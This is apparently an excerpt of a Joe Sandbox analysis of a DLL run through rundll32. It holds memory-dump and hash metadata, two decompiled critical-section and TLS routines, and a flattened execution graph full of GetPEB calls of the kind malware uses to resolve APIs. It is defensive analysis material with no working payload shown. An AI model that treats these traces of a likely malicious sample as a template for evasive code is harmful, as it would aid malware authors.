                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: H_prolog3Paint$BeginClientDrawEllipseIconRect
                                                                                                        • String ID: n^t
                                                                                                        • API String ID: 1519701795-440804003
                                                                                                        • Opcode ID: c0243cdffed27d251df2c4ad4dbf0815c844f957b5253b9c2be9b75364de2a32
                                                                                                        • Instruction ID: adf53102796b076a59f840a3c0315d1260355d9b8725bbee87c9c6663115db88
                                                                                                        • Opcode Fuzzy Hash: c0243cdffed27d251df2c4ad4dbf0815c844f957b5253b9c2be9b75364de2a32
                                                                                                        • Instruction Fuzzy Hash: A4F03C71A0021C9FDF05EFE0CC56AEEBBB8FF04305F000126E802BA065DA70AA45DB40
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 82%
                                                                                                        			E1002966C(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
                                                                                                        				void* __edi;
                                                                                                        				struct _CRITICAL_SECTION* _t4;
                                                                                                        				void* _t7;
                                                                                                        				void* _t10;
                                                                                                        				signed int _t11;
                                                                                                        				void* _t14;
                                                                                                        				intOrPtr* _t15;
                                                                                                        				void* _t17;
                                                                                                        
                                                                                                        				_t17 = __ebp;
                                                                                                        				_t14 = __esi;
                                                                                                        				_t7 = __ebx;
                                                                                                        				_t11 = _a4;
                                                                                                        				_t20 = _t11 - 0x11;
                                                                                                        				if(_t11 >= 0x11) {
                                                                                                        					_t4 = E1000836F(__ebx, _t10, _t11, __esi, _t20);
                                                                                                        				}
                                                                                                        				if( *0x10098f10 == 0) {
                                                                                                        					_t4 = E10029648();
                                                                                                        				}
                                                                                                        				_push(_t7);
                                                                                                        				_push(_t17);
                                                                                                        				_push(_t14);
                                                                                                        				_t15 = 0x100990c8 + _t11 * 4;
                                                                                                        				if( *_t15 == 0) {
                                                                                                        					EnterCriticalSection(0x100990b0);
                                                                                                        					if( *_t15 == 0) {
                                                                                                        						_t4 = 0x10098f18 + _t11 * 0x18;
                                                                                                        						InitializeCriticalSection(_t4);
                                                                                                        						 *_t15 =  *_t15 + 1;
                                                                                                        					}
                                                                                                        					LeaveCriticalSection(0x100990b0);
                                                                                                        				}
                                                                                                        				EnterCriticalSection(0x10098f18 + _t11 * 0x18);
                                                                                                        				return _t4;
                                                                                                        			}












                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(100990B0,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296A8
                                                                                                        • InitializeCriticalSection.KERNEL32(?,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296B7
                                                                                                        • LeaveCriticalSection.KERNEL32(100990B0,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296C4
                                                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,?,10029CDD,00000010,00000008,1000AB47,1000AAEA,10008389,1000AB51,10008F14,00000000,10008F7E,00000001), ref: 100296D0
                                                                                                          • Part of subcall function 1000836F: __CxxThrowException@8.LIBCMT ref: 10008383
                                                                                                          • Part of subcall function 1000836F: __EH_prolog3.LIBCMT ref: 10008390
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
                                                                                                        • String ID:
                                                                                                        • API String ID: 2895727460-0
                                                                                                        • Opcode ID: 6f3c69d74975b2dd73dd8ca5eff01aac7540849a24616913bb99ab06ec1d7e59
                                                                                                        • Instruction ID: 2bc478f2a984c7191453bc9876f7a5e599c39731c572353a2b3c8c9ab9bc8442
                                                                                                        • Opcode Fuzzy Hash: 6f3c69d74975b2dd73dd8ca5eff01aac7540849a24616913bb99ab06ec1d7e59
                                                                                                        • Instruction Fuzzy Hash: BDF02433101122DFE7009B58EC8CB5DBBEAFBD1385F82112AF58492125DB319A80CBA1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10029C5B(long* __ecx, signed int _a4) {
                                                                                                        				void* _t9;
                                                                                                        				struct _CRITICAL_SECTION* _t12;
                                                                                                        				signed int _t14;
                                                                                                        				long* _t16;
                                                                                                        
                                                                                                        				_t16 = __ecx;
                                                                                                        				_t1 =  &(_t16[7]); // 0x10099188
                                                                                                        				_t12 = _t1;
                                                                                                        				EnterCriticalSection(_t12);
                                                                                                        				_t14 = _a4;
                                                                                                        				if(_t14 <= 0) {
                                                                                                        					L5:
                                                                                                        					LeaveCriticalSection(_t12);
                                                                                                        					return 0;
                                                                                                        				}
                                                                                                        				_t3 =  &(_t16[3]); // 0x3
                                                                                                        				if(_t14 >=  *_t3) {
                                                                                                        					goto L5;
                                                                                                        				}
                                                                                                        				_t9 = TlsGetValue( *_t16);
                                                                                                        				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
                                                                                                        					goto L5;
                                                                                                        				} else {
                                                                                                        					LeaveCriticalSection(_t12);
                                                                                                        					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
                                                                                                        				}
                                                                                                        			}








                                                                                                        APIs
                                                                                                        • EnterCriticalSection.KERNEL32(10099188,?,?,?,1002A11C,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A,?), ref: 10029C64
                                                                                                        • TlsGetValue.KERNEL32(1009916C,?,?,?,1002A11C,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A,?), ref: 10029C79
                                                                                                        • LeaveCriticalSection.KERNEL32(10099188,?,?,?,1002A11C,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A,?), ref: 10029C8F
                                                                                                        • LeaveCriticalSection.KERNEL32(10099188,?,?,?,1002A11C,?,00000004,1000AB28,10008389,1000AB51,10008F14,00000000,10008F7E,00000001,1000191A,?), ref: 10029C9A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CriticalSection$Leave$EnterValue
                                                                                                        • String ID:
                                                                                                        • API String ID: 3969253408-0
                                                                                                        • Opcode ID: 5bfb8daad01ca6e2d194134a80a980d4f1414dab5f5cef2ff605cc8157845a59
                                                                                                        • Instruction ID: 0211c4953dd3dd4b273e8ea568224fb9b878430c403ed51456de19cbeddb206f
                                                                                                        • Opcode Fuzzy Hash: 5bfb8daad01ca6e2d194134a80a980d4f1414dab5f5cef2ff605cc8157845a59
                                                                                                        • Instruction Fuzzy Hash: BFF012762016119FE310CF65DC8881EB7F9EF84391766895AE845A7121D731FC058B50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:3.6%
                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                        Signature Coverage:0.1%
                                                                                                        Total number of Nodes:1074
                                                                                                        Total number of Limit Nodes:5

                                                                                                        Graph

4531->4494 4536 30f1365 4532->4536 4533 30de7fe GetPEB 4533->4536 4534 30f188a 4535 30d2043 GetPEB 4534->4535 4538 30f1888 4535->4538 4536->4533 4536->4534 4537 30df38a GetPEB 4536->4537 4536->4538 4537->4536 4538->4394 4542 30ed0bd 4539->4542 4540 30df38a GetPEB 4540->4542 4541 30ed43d 4545 30ebb18 GetPEB 4541->4545 4542->4540 4542->4541 4543 30ed43b 4542->4543 4550 30ebb18 4542->4550 4543->4394 4545->4543 4547 30d196c 4546->4547 4548 30d1ed4 GetPEB 4547->4548 4549 30d1a02 4548->4549 4549->4394 4551 30ebb35 4550->4551 4552 30d1ed4 GetPEB 4551->4552 4553 30ebbd7 4552->4553 4553->4542 4555 30e3d4f 4554->4555 4556 30e3d69 4554->4556 4555->4556 4557 30d2043 GetPEB 4555->4557 4556->4090 4557->4555 4559 30ef416 4558->4559 4560 30d3f5c GetPEB 4559->4560 4561 30ef5d5 4559->4561 4565 30f0352 GetPEB 4559->4565 4566 30df38a GetPEB 4559->4566 4567 30ef5ea 4559->4567 4572 30dd10c 4559->4572 4576 30e2f01 4559->4576 4560->4559 4564 30d2043 GetPEB 4561->4564 4564->4567 4565->4559 4566->4559 4567->4090 4569 30d89eb 4568->4569 4580 30e3e1f 4569->4580 4573 30dd12d 4572->4573 4574 30df38a GetPEB 4573->4574 4575 30dd1d5 4574->4575 4575->4559 4577 30e2f2c 4576->4577 4578 30f2e95 GetPEB 4577->4578 4579 30e2f4e 4578->4579 4579->4559 4583 30e3e39 4580->4583 4581 30df38a GetPEB 4581->4583 4583->4581 4586 30e3f28 4583->4586 4587 30d8a57 4583->4587 4589 30e44aa 4583->4589 4598 30e7ed1 4583->4598 4616 30deb41 4583->4616 4588 30d2043 GetPEB 4586->4588 4587->4090 4588->4587 4597 30e49f3 4589->4597 4590 30e4b7e 4591 30d2153 GetPEB 4590->4591 4593 30e4b7c 4591->4593 4593->4583 4594 30d3f5c GetPEB 4594->4597 4595 30e54fd GetPEB 4595->4597 4596 30f0352 GetPEB 4596->4597 4597->4590 4597->4593 4597->4594 4597->4595 4597->4596 4621 30e77bd 4597->4621 4615 30e8be7 4598->4615 4601 30e90b5 4601->4601 4602 30d1f77 GetPEB 4602->4615 4604 30d3f5c GetPEB 4604->4615 4605 30e8f42 4608 30d2153 GetPEB 4605->4608 4607 30e77bd GetPEB 4607->4615 4609 30e8f67 4608->4609 4609->4583 4610 30d1ed4 GetPEB 4610->4615 4613 
30f0352 GetPEB 4613->4615 4614 30e54fd GetPEB 4614->4615 4615->4601 4615->4602 4615->4604 4615->4605 4615->4607 4615->4610 4615->4613 4615->4614 4625 30f3044 4615->4625 4629 30eec19 4615->4629 4633 30ecdff 4615->4633 4637 30d220a 4615->4637 4641 30d8b42 4615->4641 4645 30d758f 4615->4645 4617 30ecdff GetPEB 4616->4617 4618 30dec09 4617->4618 4619 30d2043 GetPEB 4618->4619 4620 30dec20 4619->4620 4620->4583 4622 30e77f0 4621->4622 4623 30d2309 GetPEB 4622->4623 4624 30e7889 4623->4624 4624->4597 4626 30f305d 4625->4626 4627 30d2309 GetPEB 4626->4627 4628 30f30ed 4627->4628 4628->4615 4630 30eec38 4629->4630 4631 30d2309 GetPEB 4630->4631 4632 30eeccf 4631->4632 4632->4615 4634 30ece12 4633->4634 4635 30d2309 GetPEB 4634->4635 4636 30ecead 4635->4636 4636->4615 4638 30d2242 4637->4638 4639 30d2309 GetPEB 4638->4639 4640 30d22ee 4639->4640 4640->4615 4642 30d8b67 4641->4642 4643 30d2309 GetPEB 4642->4643 4644 30d8bf6 4643->4644 4644->4615 4648 30d82fc 4645->4648 4646 30df38a GetPEB 4646->4648 4647 30d2043 GetPEB 4647->4648 4648->4646 4648->4647 4650 30d879a 4648->4650 4651 30d833d 4648->4651 4653 30d3f5c GetPEB 4648->4653 4654 30e55bd GetPEB 4648->4654 4656 30e54fd GetPEB 4648->4656 4658 30f0352 GetPEB 4648->4658 4660 30ef6d3 4648->4660 4664 30dd9c6 4648->4664 4668 30f0a43 4648->4668 4650->4650 4652 30d2153 GetPEB 4651->4652 4655 30d8362 4652->4655 4653->4648 4654->4648 4655->4615 4656->4648 4658->4648 4661 30ef6e6 4660->4661 4662 30d2309 GetPEB 4661->4662 4663 30ef784 4662->4663 4663->4648 4665 30dd9fd 4664->4665 4666 30d2309 GetPEB 4665->4666 4667 30dda92 4666->4667 4667->4648 4669 30f0a7b 4668->4669 4670 30d2309 GetPEB 4669->4670 4671 30f0b13 4670->4671 4671->4648 4676 30d9f63 4672->4676 4673 30ed617 GetPEB 4673->4676 4674 30da019 4687 30de9c7 4674->4687 4676->4673 4676->4674 4677 30da017 4676->4677 4678 30ef6d3 GetPEB 4676->4678 4677->4100 4678->4676 4680 30f344f 4679->4680 4681 30d2309 GetPEB 4680->4681 4682 30f34e4 4681->4682 4682->4100 4684 30efeb7 4683->4684 
4685 30d2309 GetPEB 4684->4685 4686 30eff44 4685->4686 4686->4100 4688 30de9e0 4687->4688 4689 30d2309 GetPEB 4688->4689 4690 30dea63 4689->4690 4690->4677 4692 30d4315 4691->4692 4693 30d2309 GetPEB 4692->4693 4694 30d4394 4693->4694 4694->4113 4696 30e38f2 4695->4696 4697 30d2309 GetPEB 4696->4697 4698 30e3987 4697->4698 4698->4112 4700 30d2309 GetPEB 4699->4700 4701 30d89cf 4700->4701 4701->4117 4703 30d4c1a 4702->4703 4704 30d5a31 GetPEB 4703->4704 4705 30d4edf 4704->4705 4706 30d5a31 GetPEB 4705->4706 4707 30d4efa 4706->4707 4708 30d5a31 GetPEB 4707->4708 4709 30d4f10 4708->4709 4710 30de9c7 GetPEB 4709->4710 4711 30d4f2b 4710->4711 4712 30de9c7 GetPEB 4711->4712 4713 30d4f49 4712->4713 4723 30e7bb2 4713->4723 4717 30d2309 GetPEB 4716->4717 4718 30d423f 4717->4718 4718->4117 4720 30e03ac 4719->4720 4721 30f2e95 GetPEB 4720->4721 4722 30e03c9 4721->4722 4722->4117 4724 30e7bc8 4723->4724 4725 30d2309 GetPEB 4724->4725 4726 30d4f81 4725->4726 4726->4121 4728 30eeae9 4727->4728 4729 30f2e95 GetPEB 4728->4729 4730 30eeb0c 4729->4730 4730->4126 4732 30ecef4 4731->4732 4733 30d2309 GetPEB 4732->4733 4734 30ecf9d 4733->4734 4734->4137 4736 30ee38a 4735->4736 4737 30d2309 GetPEB 4736->4737 4738 30ee428 4737->4738 4738->4137 4740 30e3d84 4739->4740 4741 30d2309 GetPEB 4740->4741 4742 30e3e14 4741->4742 4742->4146 4744 30de0bb 4743->4744 4745 30d2309 GetPEB 4744->4745 4746 30de164 4745->4746 4746->4151 4748 30e56d3 4747->4748 4749 30d2309 GetPEB 4748->4749 4750 30e5773 4749->4750 4750->4151 4752 30eabde 4751->4752 4753 30d2309 GetPEB 4752->4753 4754 30eac8f 4753->4754 4754->4156 4756 30ea1f5 4755->4756 4757 30d2309 GetPEB 4756->4757 4758 30ea299 4757->4758 4758->4156 4760 30eb102 4759->4760 4761 30d2309 GetPEB 4760->4761 4762 30eb1a2 4761->4762 4762->4165 4764 30f3383 4763->4764 4765 30d2309 GetPEB 4764->4765 4766 30f3431 4765->4766 4766->4165 4768 30e19c9 4767->4768 4769 30d2309 GetPEB 4768->4769 4770 30e1a65 4769->4770 4770->4165 4772 30dabf2 4771->4772 4773 30d2309 
GetPEB 4772->4773 4774 30d3b21 4773->4774 4774->4042 4776 30e7d5d 4775->4776 4777 30d2309 GetPEB 4776->4777 4778 30e7dfa 4777->4778 4778->4176 4780 30d9a76 4779->4780 4781 30d9d6d 4780->4781 4782 30d9d6f 4780->4782 4783 30df38a GetPEB 4780->4783 4790 30f0f49 4780->4790 4781->4176 4784 30f0f49 GetPEB 4782->4784 4783->4780 4784->4781 4787 30e3c40 4786->4787 4788 30d2309 GetPEB 4787->4788 4789 30e3cd2 4788->4789 4789->4176 4791 30f0f76 4790->4791 4792 30d2309 GetPEB 4791->4792 4793 30f100e 4792->4793 4793->4780 4795 30eaf05 4794->4795 4796 30d3f5c GetPEB 4795->4796 4797 30eb095 4796->4797 4804 30d2411 4797->4804 4800 30f0352 GetPEB 4801 30eb0c5 4800->4801 4808 30ef790 4801->4808 4805 30d2430 4804->4805 4806 30f2e95 GetPEB 4805->4806 4807 30d2449 4806->4807 4807->4800 4809 30ef7a6 4808->4809 4810 30d2309 GetPEB 4809->4810 4811 30eb0dd 4810->4811 4811->4192 4813 30e3fc7 4812->4813 4814 30d2309 GetPEB 4813->4814 4815 30e4063 4814->4815 4815->4210 4818 30dc624 4816->4818 4820 30dcc75 4818->4820 4822 30dcc73 4818->4822 4823 30d3f5c GetPEB 4818->4823 4824 30d2411 GetPEB 4818->4824 4825 30dab99 GetPEB 4818->4825 4826 30dc5fe GetPEB 4818->4826 4827 30f0352 GetPEB 4818->4827 4828 30ee9e8 4818->4828 4832 30e1a80 4818->4832 4836 30dfbfa 4820->4836 4822->4206 4823->4818 4824->4818 4825->4818 4826->4818 4827->4818 4829 30eea04 4828->4829 4830 30d2309 GetPEB 4829->4830 4831 30eea9e 4830->4831 4831->4818 4833 30e1a9d 4832->4833 4834 30d2309 GetPEB 4833->4834 4835 30e1b45 4834->4835 4835->4818 4837 30dfc0d 4836->4837 4838 30d2309 GetPEB 4837->4838 4839 30dfcbd 4838->4839 4839->4822 4843 30d3739 4840->4843 4841 30d377a 4841->4215 4843->4841 4844 30e38ca GetPEB 4843->4844 4845 30d376a 4843->4845 4944 30e98bd 4843->4944 4952 30f0687 4843->4952 4844->4843 4940 30ddfd3 4845->4940 4860 30f2220 4848->4860 4849 30ea566 GetPEB 4849->4860 4851 30f24b4 4852 30ecaa8 2 API calls 4851->4852 4853 30f24e1 4852->4853 4856 30ea566 GetPEB 4853->4856 4864 30f24b2 4853->4864 4854 30ed617 GetPEB 
4854->4860 4859 30f24ff 4856->4859 4858 30e3fae GetPEB 4858->4860 4861 30ea566 GetPEB 4859->4861 4860->4849 4860->4851 4860->4854 4860->4858 4862 30d4af2 GetPEB 4860->4862 4860->4864 4865 30d3f5c GetPEB 4860->4865 4866 30dab99 GetPEB 4860->4866 4867 30f0352 GetPEB 4860->4867 4969 30ee867 4860->4969 4972 30f01ed 4860->4972 4976 30f25c3 4860->4976 4983 30da048 4860->4983 4991 30ddaae 4860->4991 4861->4864 4862->4860 4864->4215 4865->4860 4866->4860 4867->4860 4877 30dc4c4 4869->4877 4870 30ecaa8 2 API calls 4870->4877 4871 30ed617 GetPEB 4871->4877 4872 30dc5f4 4872->4215 4873 30e3fae GetPEB 4873->4877 4874 30f01ed GetPEB 4874->4877 4875 30d3f5c GetPEB 4875->4877 4876 30dab99 GetPEB 4876->4877 4877->4870 4877->4871 4877->4872 4877->4873 4877->4874 4877->4875 4877->4876 4878 30f0352 GetPEB 4877->4878 4879 30f25c3 GetPEB 4877->4879 4878->4877 4879->4877 4884 30d3490 4880->4884 4881 30d34f6 4881->4215 4882 30f18d2 GetPEB 4882->4884 4883 30d2043 GetPEB 4883->4884 4884->4881 4884->4882 4884->4883 4885 30ddfd3 GetPEB 4884->4885 4886 30ea566 GetPEB 4884->4886 4885->4884 4886->4884 4888 30d919a 4887->4888 4889 30d3035 GetPEB 4888->4889 4890 30d3f5c GetPEB 4888->4890 4891 30d9379 4888->4891 4892 30ed617 GetPEB 4888->4892 4893 30e3fae GetPEB 4888->4893 4894 30f01ed GetPEB 4888->4894 4895 30ecaa8 2 API calls 4888->4895 4896 30dab99 GetPEB 4888->4896 4897 30f0352 GetPEB 4888->4897 4898 30f25c3 GetPEB 4888->4898 4889->4888 4890->4888 4891->4215 4892->4888 4893->4888 4894->4888 4895->4888 4896->4888 4897->4888 4898->4888 4902 30e1e5f 4899->4902 4900 30e98bd GetPEB 4900->4902 4901 30e1ea0 4901->4215 4902->4900 4902->4901 4903 30e1e90 4902->4903 4904 30e38ca GetPEB 4902->4904 4906 30f0687 GetPEB 4902->4906 4905 30ddfd3 GetPEB 4903->4905 4904->4902 4905->4901 4906->4902 4916 30eb931 4907->4916 4908 30d3035 GetPEB 4908->4916 4909 30ebb0d 4909->4215 4910 30ed617 GetPEB 4910->4916 4911 30e3fae GetPEB 4911->4916 4912 30f01ed GetPEB 4912->4916 4913 30ecaa8 2 API calls 4913->4916 4914 
30d3f5c GetPEB 4914->4916 4915 30dab99 GetPEB 4915->4916 4916->4908 4916->4909 4916->4910 4916->4911 4916->4912 4916->4913 4916->4914 4916->4915 4917 30f0352 GetPEB 4916->4917 4918 30f25c3 GetPEB 4916->4918 4917->4916 4918->4916 5025 30f10f0 4919->5025 4921 30d3035 GetPEB 4930 30e2a46 4921->4930 4923 30ed617 GetPEB 4923->4930 4924 30d2654 GetPEB 4924->4930 4925 30d2043 GetPEB 4925->4930 4926 30e2e15 4926->4215 4927 30ef6d3 GetPEB 4927->4930 4928 30e2e17 4931 30ea566 GetPEB 4928->4931 4929 30e3fae GetPEB 4929->4930 4930->4921 4930->4923 4930->4924 4930->4925 4930->4926 4930->4927 4930->4928 4930->4929 4932 30e0387 GetPEB 4930->4932 4934 30ecaa8 2 API calls 4930->4934 4935 30f01ed GetPEB 4930->4935 4936 30d3f5c GetPEB 4930->4936 4937 30dab99 GetPEB 4930->4937 4938 30f0352 GetPEB 4930->4938 4939 30f25c3 GetPEB 4930->4939 5028 30dea72 4930->5028 5032 30d7283 4930->5032 4931->4926 4932->4930 4934->4930 4935->4930 4936->4930 4937->4930 4938->4930 4939->4930 4941 30ddfe3 4940->4941 4957 30dfcc9 4941->4957 4945 30e98d4 4944->4945 4946 30e9b60 4945->4946 4961 30d68df 4945->4961 4946->4843 4949 30d1ed4 GetPEB 4950 30e9b17 4949->4950 4950->4946 4951 30d1ed4 GetPEB 4950->4951 4951->4950 4955 30f069b 4952->4955 4953 30f07ed 4953->4843 4954 30e9d10 GetPEB 4954->4955 4955->4953 4955->4954 4965 30e7e0b 4955->4965 4958 30dfce8 4957->4958 4959 30d2309 GetPEB 4958->4959 4960 30de09b 4959->4960 4960->4841 4962 30d68fd 4961->4962 4963 30d2309 GetPEB 4962->4963 4964 30d6990 4963->4964 4964->4946 4964->4949 4966 30e7e2a 4965->4966 4967 30d2309 GetPEB 4966->4967 4968 30e7ec4 4967->4968 4968->4955 4970 30d2309 GetPEB 4969->4970 4971 30ee905 4970->4971 4971->4860 4973 30f0204 4972->4973 4974 30d419a GetPEB 4973->4974 4975 30f029e 4974->4975 4975->4860 4982 30f25dd 4976->4982 4978 30f2850 4979 30ea566 GetPEB 4978->4979 4981 30f284e 4979->4981 4980 30e199d GetPEB 4980->4982 4981->4860 4982->4978 4982->4980 4982->4981 5001 30ed551 4982->5001 4985 30da06d 4983->4985 4984 30ee867 GetPEB 
4984->4985 4985->4984 4987 30da2da 4985->4987 4989 30da2d8 4985->4989 5005 30f0104 4985->5005 5009 30efc5c 4985->5009 4990 30ea566 GetPEB 4987->4990 4989->4860 4990->4989 4999 30ddaed 4991->4999 4992 30d5a31 GetPEB 4992->4999 4994 30dde94 5013 30ecfb7 4994->5013 4995 30d3f5c GetPEB 4995->4999 4997 30ddeb0 4997->4860 4999->4992 4999->4994 4999->4995 4999->4997 5000 30f0352 GetPEB 4999->5000 5017 30eff53 4999->5017 5021 30d2f36 4999->5021 5000->4999 5002 30ed578 5001->5002 5003 30d2309 GetPEB 5002->5003 5004 30ed601 5003->5004 5004->4982 5006 30f012a 5005->5006 5007 30d2309 GetPEB 5006->5007 5008 30f01d3 5007->5008 5008->4985 5010 30efc78 5009->5010 5011 30d2309 GetPEB 5010->5011 5012 30efd02 5011->5012 5012->4985 5014 30ecfcd 5013->5014 5015 30d2309 GetPEB 5014->5015 5016 30ed085 5015->5016 5016->4997 5018 30eff70 5017->5018 5019 30d2309 GetPEB 5018->5019 5020 30f001b 5019->5020 5020->4999 5022 30d2f75 5021->5022 5023 30d2309 GetPEB 5022->5023 5024 30d3012 5023->5024 5024->4999 5026 30d2309 GetPEB 5025->5026 5027 30f118a 5026->5027 5027->4930 5029 30deaa3 5028->5029 5030 30d2309 GetPEB 5029->5030 5031 30deb25 5030->5031 5031->4930 5033 30d72a9 5032->5033 5034 30df38a GetPEB 5033->5034 5035 30d755d 5033->5035 5036 30d755f 5033->5036 5034->5033 5035->4930 5037 30ebb18 GetPEB 5036->5037 5037->5035 5039 30ecd19 5038->5039 5040 30d2309 GetPEB 5039->5040 5041 30ecdda 5040->5041 5041->4237 5043 30e90e0 5042->5043 5046 30d2043 GetPEB 5043->5046 5047 30f343c GetPEB 5043->5047 5048 30df38a GetPEB 5043->5048 5049 30e9891 5043->5049 5050 30e98a4 5043->5050 5051 30ea1d9 GetPEB 5043->5051 5054 30d419a GetPEB 5043->5054 5055 30e9c25 5043->5055 5059 30d887a 5043->5059 5063 30ede17 5043->5063 5046->5043 5047->5043 5048->5043 5052 30d2043 GetPEB 5049->5052 5050->4237 5051->5043 5052->5050 5054->5043 5056 30e9c5f 5055->5056 5057 30d2309 GetPEB 5056->5057 5058 30e9cf1 5057->5058 5058->5043 5060 30d8896 5059->5060 5061 30d2309 GetPEB 5060->5061 5062 30d8923 5061->5062 5062->5043 5064 
30ede42 5063->5064 5065 30d2309 GetPEB 5064->5065 5066 30ededd 5065->5066 5066->5043 5068 30ed48c 5067->5068 5069 30d2309 GetPEB 5068->5069 5070 30ed53e 5069->5070 5070->4248 5072 30dbfd7 5071->5072 5082 30e03d1 5072->5082 5075 30dc14c 5075->4265 5078 30ea566 GetPEB 5078->5075 5089 30d30f6 5079->5089 5083 30d2309 GetPEB 5082->5083 5084 30dc120 5083->5084 5084->5075 5085 30dbede 5084->5085 5086 30dbef9 5085->5086 5087 30d2309 GetPEB 5086->5087 5088 30dbfa2 5087->5088 5088->5078 5096 30d3123 5089->5096 5092 30d332b 5093 30ea566 GetPEB 5092->5093 5094 30d3329 5093->5094 5094->4265 5096->5092 5096->5094 5098 30d9db5 5096->5098 5101 30ef606 5096->5101 5105 30ea4a0 5096->5105 5109 30e1b54 5096->5109 5099 30d8934 GetPEB 5098->5099 5100 30d9e07 5099->5100 5100->5096 5102 30ef61c 5101->5102 5103 30d2309 GetPEB 5102->5103 5104 30ef6c5 5103->5104 5104->5096 5106 30ea4b7 5105->5106 5107 30d2309 GetPEB 5106->5107 5108 30ea557 5107->5108 5108->5096 5110 30d2309 GetPEB 5109->5110 5111 30e1c02 5110->5111 5111->5096 5113 30e523f 5112->5113 5115 30e548e 5113->5115 5118 30e548c 5113->5118 5124 30dbe19 5113->5124 5116 30d5923 GetPEB 5115->5116 5117 30e54a8 5116->5117 5128 30e4baa 5117->5128 5118->4268 5123 30f0352 GetPEB 5123->5118 5125 30dbe2f 5124->5125 5126 30d2309 GetPEB 5125->5126 5127 30dbed0 5126->5127 5127->5113 5137 30de16f 5128->5137 5132 30e4d82 5133 30e7a91 5132->5133 5134 30e7ab3 5133->5134 5135 30f2e95 GetPEB 5134->5135 5136 30e54dd 5135->5136 5136->5123 5138 30de18c 5137->5138 5139 30d2309 GetPEB 5138->5139 5140 30de20e 5139->5140 5140->5132 5141 30ea809 5140->5141 5142 30ea837 5141->5142 5143 30d2309 GetPEB 5142->5143 5144 30ea8db 5143->5144 5144->5132 5146 30e73dc 5145->5146 5147 30d2309 GetPEB 5146->5147 5148 30d4bd3 5147->5148 5148->4042 5150 30ee927 5149->5150 5151 30d2309 GetPEB 5150->5151 5152 30ee9da 5151->5152 5152->4294 5154 30d69c6 5153->5154 5155 30d2309 GetPEB 5154->5155 5156 30d6a62 5155->5156 5156->4294 5162 30d52ae 5157->5162 5158 30d3f5c GetPEB 
